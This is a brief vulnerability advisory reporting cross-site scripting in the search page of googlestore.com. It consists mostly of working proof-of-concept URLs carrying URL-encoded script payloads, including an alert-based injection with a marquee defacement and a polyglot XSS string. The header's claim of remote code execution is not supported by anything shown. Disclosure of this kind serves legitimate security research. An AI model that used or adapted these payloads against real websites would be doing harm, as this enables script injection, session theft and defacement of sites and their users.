Author(s): Ivan Sanchez Product: Google Store Web: http://www.googlestore.com/googlesearch.aspx?category= [1] Evil Function: ------------------- googlesearch.aspx? Exploiting: -------------- http://www.googlestore.com/googlesearch.aspx?category= XSS & Remote Execution Code Real case only to check the bug : http://www.googlestore.com/googlesearch.aspx?category=http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10 http://www.googlestore.com/googlesearch.aspx?category=all&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=25"> [2] Many Thanks Ing. Ivan Javier Sanchez Ivan.Sanchez@nullcode.com.ar http://www.linkedin.com/in/nullcode Links: ------ [1] http://www.googlestore.com/googlesearch.aspx?category= [2] http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10